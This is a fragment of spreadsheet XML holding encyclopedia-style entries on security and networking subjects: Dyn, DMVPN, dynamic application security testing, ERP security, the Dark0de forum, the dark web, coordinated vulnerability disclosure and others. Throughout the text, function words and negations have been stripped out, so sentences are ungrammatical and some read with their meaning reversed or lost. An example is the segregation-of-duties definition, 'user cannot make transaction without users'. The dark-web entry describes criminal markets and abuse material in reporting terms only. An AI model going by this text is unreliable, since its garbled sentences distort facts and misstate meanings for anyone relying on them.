dyn's website become unreachable (although sites available address manually maintained hosts file). acquisition oracle november 2016: announced agreed acquired oracle corporationjune 2018: oracle released internet intelligence map, free tool provides data worldwide internet traffic disruptions. uses internet intelligence technology oracle acquired dyn.june 2019: oracle announced dyn's managed standard services would shutting 2020; date later extended 2023. email sent standard customers informed standard service would replaced "enhanced, paid subscription version" hosted oracle cloud infrastructure (oci). several customers publicly shared would migrating oci. addition, large number dyn's manchester, hampshire employees laid office space rent building owner.many people upset this, including early adopters receiving "free life" standard service, longer honored transition dns. truly appreciate support throughout years. while discontinuing availability services received no-cost, surprised affordable service within along outstanding capabilities service." acquisitions acquired three companies 2010: everydns, editdns, sendlabs. acquired companies following years: september 2012- seo/sem ecommerce development parts incutio ltd. they also acquired long time provider tzo. january 2013- performance monitoring company verelo. 2013- mobile dashboard startup trendslide. december 2013- readystatus, tool notifies customers planned unplanned service interruptions. march 2014- nettica, us-based managed provider. 2014- renesys, specialist monitoring internet provide data cloud services, connectivity potential performance issues. february 2018- oracle announced agreement acquire zenedge, florida-based application security company. acquisition closed march 2018, zenedge became part oracle global business unit. also hosting service public recursive name servers dynamic list managed providers references external links oracle cloud community forum dyn’s help center status updates "manchester feels effect". hampshire business review. 2019-09-12. retrieved 2021-05-30.&lt;/ref&gt;</t>
  </si>
  <si>
    <t>SAP NetWeaver Identity Management</t>
  </si>
  <si>
    <t>netweaver identity management identity management software suite acquired 2007 maxware. latest release software version 8.0, service pack released july, 2017. netweaver identity management tool used manage full identity life cycle users joining organization moving across positions inside organization. manages user access, provides user access according current business roles, manages passwords self-service capabilities approval workflows. also, user leaving organization, automatically deprovisions user access rights. normally, life cycle changes come integration human capital management successfactors. identity management integrates access control check compliance issues, risk analysis, risk mitigation connected role assignments, well possible segregation-of-duties conflicts. references external links netweaver identity management documentation netweaver identity management (sap idm)</t>
  </si>
  <si>
    <t>Dynamic Multipoint Virtual Private Network</t>
  </si>
  <si>
    <t>dynamic multipoint virtual private network (dmvpn) dynamic tunneling form virtual private network (vpn) supported cisco ios-based routers, huawei routers, unix-like operating systems. benefits dmvpn provides capability creating dynamic-mesh network without pre-configure (static) possible tunnel end-point peers, including ipsec (internet protocol security) isakmp (internet security association management protocol) peers. dmvpn initially configured build hub-and-spoke network statically configuring hubs (vpn headends) spokes, change configuration required accept spokes. using initial hub-and-spoke network, tunnels spokes dynamically built demand (dynamic-mesh) without additional configuration hubs spokes. this dynamic-mesh capability alleviates need load route data spoke networks. technologies generic routing encapsulation (gre), 1701, multipoint spoke-to-spoke tunnels desired nhrp (next-hop resolution protocol), 2332 ipsec (internet protocol security) using ipsec profile, associated virtual tunnel interface software. traffic sent tunnel encrypted policy configured (ipsec transform set) ip-based routing protocol, eigrp, ospf, ripv2, (dmvpn hub-and-spoke only). internal routing routing protocols ospf, eigrp generally spoke allow growth scalability. both eigrp allow higher number supported spokes hub. encryption tunnels, dmvpn allows several encryption schemes (including none) encryption data traversing tunnels. security reasons cisco recommend customers aes. phases dmvpn three phases route data differently. phase traffic flows spokes hub. phase start phase allows spoke-to-spoke tunnels based demand triggers. phase starts phase improves scalability fewer restrictions phase references external links cisco systems dmvpn management cisco dmvpn design guide what double expired internet draft describing dmvpn open source nhrp protocol implementation dynamic multipoint ipsec vpns (using multipoint gre/nhrp scale ipsec vpns)</t>
  </si>
  <si>
    <t>Dynamic application security testing</t>
  </si>
  <si>
    <t>dynamic application security testing (dast) functional testing process assess application using certain techniques result testing process covers security weaknesses vulnerabilities present application. this testing process carried either manual using automated tools. manual assessment application involves human intervention identify security flaws might slip automated tool. usually business logic errors, race condition checks, certain zero vulnerabilities identified using manual assessments. side, dast tool program communicates application front-end order identify potential security vulnerabilities application architectural weaknesses. performs black-box test. unlike static application security testing tools, dast tools access source code therefore detect vulnerabilities actually performing attacks. dast tools allow sophisticated scans, detecting vulnerabilities minimal user interactions configured host name, crawling parameters authentication credentials. these tools attempt detect vulnerabilities query strings, headers, fragments, verbs (get/post/put) injection. overview dast tools facilitate automated review application express purpose discovering security vulnerabilities required comply various regulatory requirements. application scanners look wide variety vulnerabilities, input/output validation: (e.g. cross-site scripting injection), specific application problems server configuration mistakes. copyrighted report published march 2012 security vendor cenzic, common application vulnerabilities recently tested applications include: commercial open-source scanners commercial scanners category web-assessment tools need purchased. some scanners include free features need bought full access tool's power. open-source scanners often free cost user. security researcher shay chen previously compiled exhaustive list commercial open-source application security scanners. list also highlights scanners performed benchmarking tests wavsep. wavsep platform publicly available used evaluate various aspects application scanners: technology support, performance, accuracy, coverage result consistency. dast strengths these tools detect vulnerabilities finalized release candidate versions prior shipping. scanners simulate malicious user attacking probing, identifying results part expected result set, allowing realistic attack simulation. advantage types tools scan year-round constantly searching vulnerabilities. with vulnerabilities discovered regularly allows companies find patch vulnerabilities become exploited.as dynamic testing tool, scanners language-dependent. application scanner able scan engine-driven applications. attackers tools, tools find vulnerability, attackers. dast weaknesses while scanning dast tool, data overwritten malicious payloads injected subject site. sites scanned production-like non-production environment ensure accurate results protecting data production environment. because tool implementing dynamic testing method, cannot cover 100% source code application then, application itself. penetration tester look coverage application attack surface know tool configured correctly able understand application. tool cannot implement variants attacks given vulnerability. tools generally predefined list attacks generate attack payloads depending tested application. some tools also quite limited understanding behavior applications dynamic content javascript flash. report 2012 found application technologies overlooked application scanners includes jquery, rest, google webtoolkit ajax applications, flash remoting (amf) html5, well mobile apps services using json rest. xml-rpc soap technologies used services, complex workflows shopping cart, xsrf/csrf tokens. references external links application security scanner evaluation criteria application security consortium (wasc) application vulnerability scanners, wiki operated nist challenges faced automated application security assessment robert auger wasc security scanner list</t>
  </si>
  <si>
    <t>Message Authenticator Algorithm</t>
  </si>
  <si>
    <t>message authenticator algorithm (maa) first cryptographic functions computing message authentication code (mac). designed 1983 donald davies david clayden national physical laboratory (united kingdom) response request bankers automated clearing services. first message authentication code algorithms gain widespread acceptance. development standardization original specification given combination natural language tables, complemented implementations basic programming languages. adopted 1987 became part international standards 8730 8731-2 intended secure authenticity integrity banking transactions. attacks later, cryptanalysis revealed various weaknesses, including feasible brute-force attacks, existence collision clusters, key-recovery techniques. reason, withdrawn standards 2002 continued used prominent case study assessing various formal methods. formal specifications used prominent case study assessing various formal methods. early 1990s, developed three formal specifications maa: lotos, vdm. specification became part 1992 revision international standard 8731-2, three implementations manually derived latter specification: miranda, modula-2.other formal models developed. 2017, complete formal specification large term rewriting system published; from specification, implementations fifteen different languages generated automatically. 2018, formal specifications maa, lotos lnt, published. references external links preneel, bart (2011). "maa". tilborg, henk jajodia, sushil (eds.). encyclopedia cryptography security (2nd ed.). springer. 741–742. doi:10.1007/978-1-4419-5906-5_591. isbn 978-1-4419-5905-8. http://www.cix.co.uk/~klockstone/maa.htm http://www.mars-workshop.org/repository/012-maa.html</t>
  </si>
  <si>
    <t>DynamicOps</t>
  </si>
  <si>
    <t>dynamicops american private software company headquartered burlington, massachusetts. backed credit suisse, intel capital, sierra ventures, next world capital, dynamicops developed cloud automation management solutions. these solutions designed help enterprise organizations create scalable private, public, desktop cloud services existing technology systems processes. acquired vmware 2012. history dynamicops' establishment connected credit suisse. original software initially developed inside credit suisse’s global research development group 2005 help company address operational governance challenges rolling virtualization technology. 2007, deployed used software manage virtual machines, credit suisse ventures decided fund company based technology. they recruited rich krueger formed company—dynamicops. dynamicops incorporated january 2008, publicly launched later spring—to develop market product. leslie muller, development effort credit suisse, became co-founder dynamicops. company raised total $27m venture funding credit suisse, intel capital, sierra ventures, next world capital. additionally, dynamicops multi-year licensing distribution agreement dell, dynamicops software component virtual integrated system solution. july 2012, dynamicops acquired vmware price ranging $100 $150 million. technology products dynamicops used operations virtualization, foundational technology cloud offerings. operations virtualization abstraction layer multiple management systems make cloud infrastructure consumers. allows staff, apply management layers without layers needing know why. dynamicops offered products, dynamicops cloud suite dynamicops cloud development kit. dynamicops cloud suite cloud-enablement suite includes dynamicops cloud automation center, dynamicops platform, dynamicops design center. combines automated service delivery unified governance control across servers desktops, virtual physical, private public cloud deployments, well graphical editor visually modifying activities workflow logic. additionally, uses operations virtualization technology enable staff centrally define cloud services make available across global infrastructure. dynamicops cloud development represents tools documentation used developers deployed dynamicops-generated cloud environments, defining cloud services. also amazon cloud computing references external links official website</t>
  </si>
  <si>
    <t>ERP security</t>
  </si>
  <si>
    <t>security wide range measures aimed protecting enterprise resource planning (erp) systems illicit access ensuring accessibility integrity system data. system computer software serves unify information intended manage organization including production, supply chain management, financial management, human resource management, customer relationship management, enterprise performance management. common systems sap, oracle e-business suite, microsoft dynamics, priority software. review system integrates business processes enabling procurement, payment, transport, human resources management, product management, financial planning. system stores confidential information, information systems audit control association (isaca) recommends regularly conduct comprehensive assessment system security, checking servers software vulnerabilities, configuration errors, segregation duties conflicts, compliance relevant standards recommendations, recommendations vendors. causes vulnerabilities systems complexity systems process transactions implement procedures ensure users different access privileges. there hundreds authorization objects permitting users perform actions system. case users company, approximately 800,000 (100*2*20*200) ways customize security settings systems. with growth complexity, possibility errors segregation duties conflicts increases. specificity vendors vulnerabilities regular basis since hackers monitor business applications find exploit security issues. releases patches monthly patch tuesday, oracle issues security fixes every quarter oracle critical patch update. business applications becoming exposed internet migrate cloud. lack competent specialists cybersecurity survey revealed organizations running systems "lack awareness actions taken towards security". isaca states "there shortage staff members trained security" security services superficial understanding risks threats associated systems. consequently, security vulnerabilities complicate undertakings detecting subsequent fixing. lack security auditing tools security audit done manually various tools packages provide means system security auditing. manual auditing complex time-consuming process increases possibility making mistake. large number customized settings system includes thousands parameters fine settings including segregation duties transactions tables, security parameters every single system. system settings customized according customers' requirements. security issues systems security issues occur systems different levels. network layer traffic interception modification absence data encryptionin 2011, sensepost specialists analyzed diag protocol used system transferring data client server. utilities published allowed intercept, decrypt, modify client-server requests containing critical information. this made attacks possible including man-in-the-middle attack. second utility operates like proxy created identify vulnerabilities. allowed modifying requests coming client server. sending password cleartext (sap j2ee telnet oracle listener versions)in system, possible perform administering functions telnet protocol, encrypts passwords. vulnerabilities encryption authentication protocols' authentication hash password encryption (sap diag) imposing outdated authentication protocols incorrect authentication protocolsvulnerabilities protocols (e.g. oracle oracle e-business suite). protocol used (remote function call) connect systems tcp/ip erp. call function enables calling running functional module located system. abap language used writing business applications functions make calls. several critical vulnerabilities found library versions 7.x: function "rfc_set_reg_server_property" allows determining exclusive server. vulnerability exploits lead denial access legitimate users. denial service becomes possible. error function "system_create_instance". exploiting vulnerability allows executing arbitrary code. error function "rfc_start_gui". exploiting vulnerability also allows executing arbitrary code. error function "rfc_start_program". exploiting vulnerability allows executing arbitrary code gain information server configuration. error function "trusted_system_security". exploiting vulnerability allows obtaining information existing users groups server. operating system level software vulnerabilities remote vulnerability used gain access applicationsweak passwords remote password brute-forcing empty passwords remote management tools like radmin vncinsecure settings smb. data becomes accessible remote users file access rights. critical dbms oracle data files insecure access rights insecure hosts settings. trusted hosts, servers listed attacker easily accesses application vulnerabilities systems transfer functionality applications level vulnerabilities: application vulnerabilities (xss, xsrf, injection, response splitting, code execution) buffer overflow format string web-servers application-servers (sap igs, netweaver, oracle weblogic) insecure privileges access (sap netweaver, crm, oracle e-business suite) role-based access control systems, rbac (role-based access control) model applied users perform transactions gain access business objects. model, decision grant access user made based functions users, roles. roles multitude transactions user group users performs company. transaction procedure transforming system data, helps perform transaction. role, number corresponding users multiple roles. roles hierarchical. after roles implemented system, transactions corresponding role rarely change. administrator needs delete users roles. administrator provides user membership roles. when employees leave organization, administrator removes roles. segregation duties segregation separation duties, also known sod, concept according user cannot make transaction without users (e.g. user cannot supplier, write cheque supplier) risk fraud much lower. implemented rbac mechanisms, notion mutually exclusive roles introduced. instance, supplier, user initiates payment procedure another accepts case, initiating payment accepting mutually exclusive roles. segregation duties either static dynamic. with static (ssod), user cannot belong mutually exclusive roles. with dynamic (dsod), user cannot perform within transaction. both advantages. ssod simple, dsod flexible. segregation duties explained matrix. matrixes describe system roles. roles mutually exclusive, flag interception corresponding rows columns. examples segregation duties software: appsian security platform oracle e-business suite ecc/s4hana security scanners security scanner software intended search vulnerabilities systems. scanner analyzes configurations system, searches misconfigurations, access control encryption conflicts, insecure components, checks updates. scanner checks system parameters compliance manufacturer's recommendations auditing procedures isaca. security scanners produce reports vulnerabilities listed according criticality. examples scanners: protect4s cybersecurity vulnerability management solution securitybridge holistic cybersecurity platform erpscan onapsis safe o'clock appsentry oracle e-business suite appsian security platform oracle e-business suite oracle peoplesoft maxpatrol data security data security software intended provide fine-grained access controls visibility specific transactions data fields within application. intention data security ensure access data dynamically enforced based context user's access versus pre-defined roles privileges. both corrupted exploited. data security software intended work conjunction organizations' existing security identity access management controls, provides granular, fine-grained levels protection particularly sensitive financial data fields. data security cases: securing remote users enforcing zero trust least privilege preventing data exfiltration privileged access management segregation duties limiting risk exposure financial transactions threat detection, response forensics custom code vulnerability detectionthe examples data security software: appsian security platform oracle e-business suite, oracle peoplesoft, ecc/s4hana references security</t>
  </si>
  <si>
    <t>Dark0de</t>
  </si>
  <si>
    <t>dark0de, also known darkode, cybercrime forum black marketplace described europol "the prolific english-speaking cybercriminal forum date". this site launched 2007, serves venue sale trade hacking services, botnets, malware, stolen personally identifiable information, credit card information, hacked server credentials, illicit goods services. history early 2013, came large ddos attack moving bulletproof hosting provider santrex off-shore, latter participant stophaus campaign spamhaus. site ongoing feud security researcher brian krebs.in april 2014, various site users attacked heartbleed exploit, gaining access private areas site. take forum target operation shrouded horizon, international enforcement effort federal bureau investigation culminated site's seizure arrests several members july 2015. according fbi, case "believed largest-ever coordinated enforcement effort directed online cyber criminal forum". upon announcing charges issued united states, attorney david hickton called site cyber hornet's nest criminal hackers", "the sophisticated english-speaking forum criminal computer hackers world" "represented gravest threats integrity data computers united states".on monday, september 2015, daniel placek appeared podcast radiolab discussing role starting darkode eventual cooperation united states government efforts take site. revivals only weeks announcement raid, site reappeared increased security, employing blockchain-based authentication operating anonymity network. researchers malwaretech suggested relaunch genuine, almost immediately after, hacked database leaked.on december version site returned original domain name. also lizard squad, hacking group, said used dark0de references external links darkode archive project news dark0de user’s guide darkode: complete history</t>
  </si>
  <si>
    <t>Dark web</t>
  </si>
  <si>
    <t>dark world wide content exists darknets: overlay networks internet require specific software, configurations, authorization access. through dark web, private computer networks communicate conduct business anonymously without divulging identifying information, user's location. dark forms small part deep web, part indexed search engines, although sometimes term deep mistakenly used refer specifically dark web.the darknets constitute dark include small, friend-to-friend peer-to-peer networks, well large, popular networks tor, freenet, i2p, riffle operated public organizations individuals. users dark refer regular clearnet unencrypted nature. dark onionland uses traffic anonymization technique onion routing network's top-level domain suffix .onion. terminology definition dark often confused deep web, parts indexed (searchable) search engines. term dark first emerged 2009; however, unknown actual dark first emerged. many internet users surface web, data accessed typical google browser. dark forms small part deep web, requires custom software order access content. this confusion dates back least 2009. since then, especially reporting silk road, terms often conflated, despite recommendations distinguished. dark web, also known darknet websites, accessible networks ("the onion routing" project) created specifically dark web. browser tor-accessible sites widely used among darknet users identified domain ".onion". browsers create encrypted entry points pathways user, allowing dark searches actions anonymous.identities locations darknet users stay anonymous cannot tracked layered encryption system. darknet encryption technology routes users' data large number intermediate servers, protects users' identity guarantees anonymity. transmitted information decrypted subsequent node scheme, leads exit node. complicated system makes almost impossible reproduce node path decrypt information layer layer. high level encryption, websites able track geolocation users, users able information host. thus, communication darknet users highly encrypted allowing users talk, blog, share files confidentially. content december 2014 study gareth owen university portsmouth found commonly hosted type content child pornography, followed black markets, individual sites highest traffic dedicated botnet operations (see attached metric). many whistleblowing sites maintain presence well political discussion forums. sites associated bitcoin, fraud-related services, mail order services prolific.as december 2020, number active sites .onion estimated 76,300 (containing copies). these, would original content.in july 2017, roger dingledine, three founders project, said facebook biggest hidden service. dark comprises traffic network.a february 2016 study researchers king's college london gives following breakdown content alternative category set, highlighting illicit .onion services. ransomware dark also used certain extortion-related processes. indeed, common observe data ransomware attacks several dark sites (data sales sites, public data repository sites. botnets botnets often structured command-and-control servers based censorship-resistant hidden service, creating large amount bot-related traffic. darknet markets commercial darknet markets mediate transactions illegal goods typically bitcoin payment. these markets attracted significant media coverage, starting popularity silk road diabolus market subsequent seizure legal authorities. silk road first dark marketplaces emerged 2011 allowed trading weapons identity fraud resources. these markets protection users closed time authorities. despite closures marketplaces, others place. 2020, least active dark market places. these marketplaces similar ebay craigslist users interact sellers leave reviews marketplace products.examination price differences dark markets versus prices real life world wide attempted well studies quality goods received dark web. study performed evolution, popular crypto-markets active january 2013 march 2015. although found digital information, concealment methods shipping country, "seems accurate", study uncovered issues quality illegal drugs sold evolution, stating that, "the illicit drugs purity found different information indicated respective listings." less known consumer motivations accessing marketplaces factors associated use. bitcoin services bitcoin main cryptocurrencies used dark marketplaces flexibility relative anonymity currency. with bitcoin, people hide intentions well identity. common approach digital currency exchanger service converted bitcoin online game currency (such gold coins world warcraft) later converted back fiat currency. bitcoin services tumblers often available tor, grams offer darknet market integration. research study undertaken jean-loup richet, research fellow essec, carried united nations office drugs crime, highlighted trends bitcoin tumblers money laundering purposes. relevance digital world, bitcoin become popular product users scam companies with. cybercriminal groups ddos"4" cyberattacks companies since emergence bitcoins 2014. these attacks formation cybercriminal groups well cyber extortion. hacking groups services many hackers sell services either individually part groups. such groups include xdedic, hackforum, trojanforge, mazafaka, dark0de therealdeal darknet market. some known track extort apparent pedophiles. cyber crimes hacking services financial institutions banks also offered dark web. attempts monitor activity made various government private organizations, examination tools used found procedia computer science journal. internet-scale distributed reflection denial service (drdos) attacks also made leveraging dark web. there many scam .onion sites also present giving tools download infected trojan horses backdoors. financing fraud scott dueweke president founder zebryx consulting states russian electronic currency webmoney perfect money behind majority illegal actions. april 2015, flashpoint received million dollar investment help clients gather intelligence deep dark web. there numerous carding forums, paypal bitcoin trading websites well fraud counterfeiting services. many sites scams themselves. phishing cloned websites scam sites numerous, darknet markets often advertised fraudulent urls. illegal pornography type content popularity dark illegal pornography—more specifically, child pornography. about traffic related accessing child pornography despite difficult find even dark web. website called lolita city, since taken down, contained child pornographic media 15,000 members.there regular enforcement action sites distributing child pornography often compromising site tracking users' addresses. 2015, investigated took website called playpen. time, playpen largest child pornography website dark 200,000 members. sites complex systems guides, forums community regulation. other content includes sexualised torture killing animals revenge porn. 2021, german police said dismantled world's biggest child pornography networks dark known boystown, website 400,000 registered users. four people detained raids, including paraguay, suspicion running network. europol said several pedophile chat sites also taken german-led intelligence operation. terrorism terrorist organizations took internet early 1990s; however, birth dark attracted organizations anonymity, lack regulation, social interaction, easy accessibility. these groups taking advantage chat platforms within dark inspire terrorist attacks. groups even posted "how guides, teaching people become hide identities terrorists.the dark became forum terrorist propaganda, guiding information, importantly, funding. with introduction bitcoin, anonymous transactions created allowed anonymous donations funding. accepting bitcoin, terrorists able fund money purchase weaponry. 2018, individual named ahmed sarsur charged attempting purchase explosives hire snipers syrian terrorists, well attempting provide financial support, dark web.there least real fraudulent websites claiming used isil (isis), including fake seized operation onymous. with increase technology, allowed cyber terrorists flourish attacking weaknesses technology. wake november 2015 paris attacks, actual site hacked anonymous-affiliated hacker group, ghostsec, replaced advert prozac. rawti shax islamist group found operating dark time. social media within dark web, exists emerging social media platforms similar world wide web, known dark social network (dwsn). dwsn works like regular social networking site members customizable pages, friends, like posts, blog forums. facebook traditional social media platforms begun make dark-web versions websites address problems associated traditional platforms continue service areas world wide web. unlike facebook, privacy policy dwsn requires members reveal absolutely personal information remain anonymous. hoaxes unverified content there reports crowdfunded assassinations hitmen hire; however, believed exclusively scams. creator silk road, ross ulbricht, arrested homeland security investigations (hsi) site allegedly hiring hitman kill people, although charges later dropped. there urban legend find live murder dark web. term "red room" coined based japanese animation urban legend name; however, evidence points toward reported instances hoaxes.on june 2015, indie game satan reviewed youtubers obscure horror corner claimed found dark web. various inconsistencies channel's reporting cast doubt reported version events. there several websites analyze monitor deep dark threat intelligence. policing dark there arguments dark promotes civil liberties, like "free speech, privacy, anonymity". some prosecutors government agencies concerned criminal activity. deep dark applications integral internet features provide privacy anonymity. policing involves targeting specific activities private deemed illegal subject internet censorship. when investigating online suspects, police typically (internet protocol) address individual; however, browsers creating anonymity, becomes impossible tactic. result, enforcement employed many tactics order identify arrest engaging illegal activity dark web. osint, open source intelligence, data collection tools legally collect information public sources. osint tools dark specific help officers find bits information would lead gaining knowledge interactions going dark web.in 2015 announced interpol offers dedicated dark training program featuring technical information tor, cybersecurity simulated darknet market takedowns. october 2013 uk's national crime agency gchq announced formation "joint operations cell" focus cybercrime. november 2015 team would tasked tackling child exploitation dark well cybercrime. march 2017 congressional research service released extensive report dark web, noting changing dynamic information accessed presented characterized unknown, increasing interest researchers, enforcement, policymakers. august 2017, according reportage, cybersecurity firms specialize monitoring researching dark behalf banks retailers routinely share findings enforcement agencies "when possible necessary" regarding illegal content. russian-speaking underground offering crime-as-a-service model regarded particularly robust. journalism many journalists, alternative news organizations, educators, researchers influential writing speaking darknet, making clear general public. media coverage typically reports dark ways; detailing power freedom speech dark allows people express, commonly reaffirms illegality fear contents, computer hackers. many headlines dark child pornography headlines "n.j. charged surfing 'dark web' collect nearly images child porn", along illegal activities news outlets describe black markets sell distribute drugs".specialist clearweb news sites deepdotweb things vice provide news coverage practical information dark sites services; however, deepdotweb shut authorities 2019. hidden wiki mirrors forks hold largest directories content given time. traditional media news channels news also featured articles examining darknet. also list onion services references external links excuse think your dark showing presentation march 2017 bsides vancouver security conference security practices tor's hidden services attacks landscape dark side</t>
  </si>
  <si>
    <t>Dark social media</t>
  </si>
  <si>
    <t>dark social media, dark social, dark traffic, social shares contain digital referral information source. idea generally used analytics well online advertising. contrary sharing social networking service like facebook, done publicly, dark social done privately channels, emails, simply copy-and-paste ways private sharing. confuse deep web, dark social media content traffic online sharing. these sharing activities often come name direct, typed/bookmarked similar form today's analytic services. 2014, believed dark social consisted sharing activities globally, whereas facebook holds 23%.however, exact nature dark social media still unknown, word "dark" name suggests unknown can't-see heart concept like dark energy astronomy. history alexis madrigal curious traffic really coming site worked for, atlantic. grew time built knew ways share information, name sites like facebook. this believe large portion traffic coming “bookmarked” “typed sources believe. with help analytics firm, chartbeat, able quantify traffic something much meaningful. article wrote brought usage term dark social.dark social also known direct social dark traffic. however, alexis madrigal’s term "dark social" widely used. desktop mobile dark social media perceived differently looking desktop computers mobile computers. 2014, almost total external mobile traffic dark social traffic, meaning traffic referrer showing coming from. contrast, one-third external desktop traffic dark social.in 2014, years alexis madrigal wrote original post dark social, started notice dark social traffic could come mobile devices well. madrigal mentioned since october 2015, facebook changed algorithm mobile app, resulted media publisher receiving 100% traffic before. meantime, also noticed atlantic, company used work for, received dark social traffic, facebook mobile traffic.alexis madrigal later performed experiment confirm theory dark social traffic boost indeed facebook mobile app. found referrer links facebook’s mobile don’t always pass destination website, creates dark social traffic mobile devices. updated charbeat report also confirmed part dark social traffic generated facebook mobile users. addition facebook mobile app, dark social traffic also come reddit mobile app, gmail instant messaging apps well.in radiumone’s report published february 2016, dark side mobile sharing, company stated found online traffic coming dark social channels date. furthermore, also showed dark social traffic, mobile devices, desktops. rise smart phones mobile apps largely increased dark social traffic mobile devices last years. amount dark social traffic mobile devices jumps 2014 2016, dark social traffic comes desktops decreases 2014 2016. marketing analytics dark social traffic consists mostly one-to-one messaging non-dark channels facebook messenger snapchat rather commonly used one-to-many methods; example, sharing twitter feed, facebook wall, traditional analytics tools rely upon. links shared private messaging methods include referral tags analytics tool, simply appear though came direct traffic could include referral tags copy pasted another non-dark social channel. because referral tags always carried private messaging, becomes impossible tell person sharing dark traffic originally obtained content another referral method directly copy-pasting link. this makes difficult marketers understand effective social media marketing strategy make changes accordingly. combat lack transparency, websites include attractive ways share links simply copy-pasting another application; example, sites implement highly visible share buttons, copy-paste button, buttons share link referral directly dark social channel like whatsapp, facebook messenger, email. rules also made within traditional analytics tools filter dark social traffic include direct links, exclude referred homepage. analytics tools also beginning incorporate ability distinguish dark social copy-paste based traffic types traffic. relationship invisible dark invisible also known deep web. where dark social referring traffic cannot analyzed, invisible referring websites data indexed search engines. essence, kinds information invisible general population internet. dark social data cannot found analytics software traffic originates invisible data show using search engines like google search microsoft bing. both hidden results unintentional. dark associated dark social invisible web, mainly hidden nature. dark data data intentionally hidden internet involved wish remain anonymous. shares dark social there interest shares content share psychology dark social sharing found people share three reasons. identity contextdark social sharing allows individualism people able freely express choosing what- whom- share rather broadcasting everything “friends.” relationship buildingdark social sharing creates “personal” channel sharing elevates builds personal relationships, even defying geographical boundaries. social currencydark social sharing allows people feel helpful, trend, interesting. when sharing smaller, intimate social circle, sharer gets knowledgeable within groups, giving street cred. email common sources dark social sharing facebook actually part cause increase dark social-through chatting messaging services. other sources dark social reddit, stumbleupon, twitter, tumblr, linkedin google+, whatsapp, viber, kwik, firechat, livetext. there evidence research accounts sharing darkly sharing means tracked easier. baby boomers (born 1946-1964) xers (born 1965-1981) commonly share email word mouth. fact, xers heaviest users email, considered dark social. millennials (born 1982-1995) younger tend toward social media sharing applications, often reported dark. addition, sharing professionally darkly, linkedin, requires upwards hours week impact. certain platforms also attract types populations blogs lgbt community. references</t>
  </si>
  <si>
    <t>NetScout Systems</t>
  </si>
  <si>
    <t>netscout systems, inc. (stylized netscout) provider application performance management network performance management products located westford, massachusetts. july 2015, netscout acquired communications business danaher corporation, including arbor networks, fluke networks, tektronix communications monitoring. netscout subsidiaries cayman islands, haven. history netscout systems founded anil singhal narendra popat frontier software 1984. netscout created first rmon based ethernet probe 1992. november 2007, netscout acquired sniffer, infinistream, network intelligence product lines network general. netscout merged product lines allow performance manager product probes infinistream technologies.in april 2011, netscout acquired voice video management company, psytechnics, ipswich u.k. acquired replay, privately held dutch company 2011, later year, many years partnering complementing solutions network switch port aggregation, netscout moved directly competition partners acquiring privately held simena networks.in october 2014, netscout systems announced entered definitive agreement acquire communications business science technology company danaher corporation $2.6 billion. upon completion merger, danaher's shareholders would nearly 59.5 percent combined company, netscout shareholders would remaining stake. analyst firm research, technology-industry syndicated research data firm, predicted 2015 acquisition, netscout largest company network visibility management space, "more 3,000 employees well $1bn year revenue".in july 2015, netscout finalized acquisition communications business danaher corporation, including arbor networks (security systems), fluke networks wi-fi network troubleshooting analytics), tektronix communications (traffic inspection, customer experience management analytics) monitoring (network packet brokers). prepared statement, company noted acquisition "accelerates netscout's strategic progress enabling company offer [...] innovative service assurance cyber security solutions" adds employees netscout. acquisitions netscout systems acquired network general 2007. network general developed original network packet sniffer (the sniffer) 1986; merged mcafee associates 1997 form network associates. mid-2004, network associates sold sniffer technologies business silver lake partners texas pacific group $275 million cash form network general. early 2006, network general acquired fidelia technology, adding netvigil business service monitoring technology network application performance analysis tools. september 2007, network general agreed acquired netscout systems $205 million. references further reading renaud, christian (may 2015). network visibility monitoring forecast: moving toward comprehensive solutions (report). research. retrieved january 2016. cécile daurat (october 2014). "netscout merge with danaher unit $2.6 billion deal". bloomberg news. retrieved december 2015. "form 10-q netscout systems inc, 5-nov-2015 quarterly report". yahoo business. retrieved january 2016. "subsidiaries netscout". exhibit netscout systems. retrieved 2019. comstock, george (2003-08-13). "oral history george comstock" (pdf). interviewed hendrie, gardner. mountain view, california, usa: computer history museum. x2727.2004. archived (pdf) original 2017-03-23. retrieved 2017-03-23. external links official website business data netscout systems, inc.:</t>
  </si>
  <si>
    <t>Coordinated vulnerability disclosure</t>
  </si>
  <si>
    <t>computer security, coordinated vulnerability disclosure, "cvd" (formerly known responsible disclosure) vulnerability disclosure model vulnerability issue disclosed public responsible parties allowed sufficient time patch remedy vulnerability issue. this coordination distinguishes model "full disclosure" model. developers hardware software often require time resources repair mistakes. often, ethical hackers find vulnerabilities. hackers computer security scientists opinion social responsibility make public aware vulnerabilities. hiding problems could cause feeling false security. avoid this, involved parties coordinate negotiate reasonable period time repairing vulnerability. depending potential impact vulnerability, expected time needed emergency workaround developed applied factors, period vary days several months. coordinated vulnerability disclosure fail satisfy security researchers expect financially compensated. time, reporting vulnerabilities expectation compensation viewed extortion. while market vulnerabilities developed, vulnerability commercialization "bug bounties") remains hotly debated topic. today, primary players commercial vulnerability market idefense, started vulnerability contributor program (vcp) 2003, tippingpoint, zero-day initiative (zdi) started 2005. these organizations follow coordinated vulnerability disclosure process material bought. between march 2003 december 2007 average 7.5% vulnerabilities affecting microsoft apple processed either zdi. independent firms financially supporting coordinated vulnerability disclosure paying bounties include facebook, google, barracuda networks. disclosure policies google project zero 90-day disclosure deadline starts notifying vendors vulnerability, details shared public defensive community days, sooner vendor releases fix.zdi 120-day disclosure deadline starts receiving response vendor. examples selected security vulnerabilities resolved applying coordinated disclosure: collision attack shows create false certificates, week starbucks gift card double-spending/race condition create free extra credits, days (egor homakov) kaminsky discovery cache poisoning, months mbta anderson, students find vulnerability massachusetts subway security, months radboud university nijmegen breaks security mifare classic cards, months meltdown vulnerability, hardware vulnerability affecting intel microprocessors arm-based microprocessors, months. spectre vulnerability, hardware vulnerability implementations branch prediction affecting modern microprocessors speculative execution, allowing malicious processes access mapped memory contents programs, months. roca vulnerability, affecting keys generated infineon library yubikeys, months. also information sensitivity white (computer security) computer emergency response team critical infrastructure protection external links cert guide coordinated vulnerability disclosure cisa coordinated vulnerability disclosure (cvd) process microsoft's approach coordinated vulnerability disclosure dutch national cyber security centre coordinated vulnerability disclosure guideline hewlett-packard coordinated vulnerability disclosure policy linksys coordinated vulnerability disclosure program global forum cyber expertise coordinated vulnerability disclosure policy philips coordinated vulnerability disclosure statement etsi coordinated vulnerability disclosure policy references</t>
  </si>
  <si>
    <t>NetIQ</t>
  </si>
  <si>
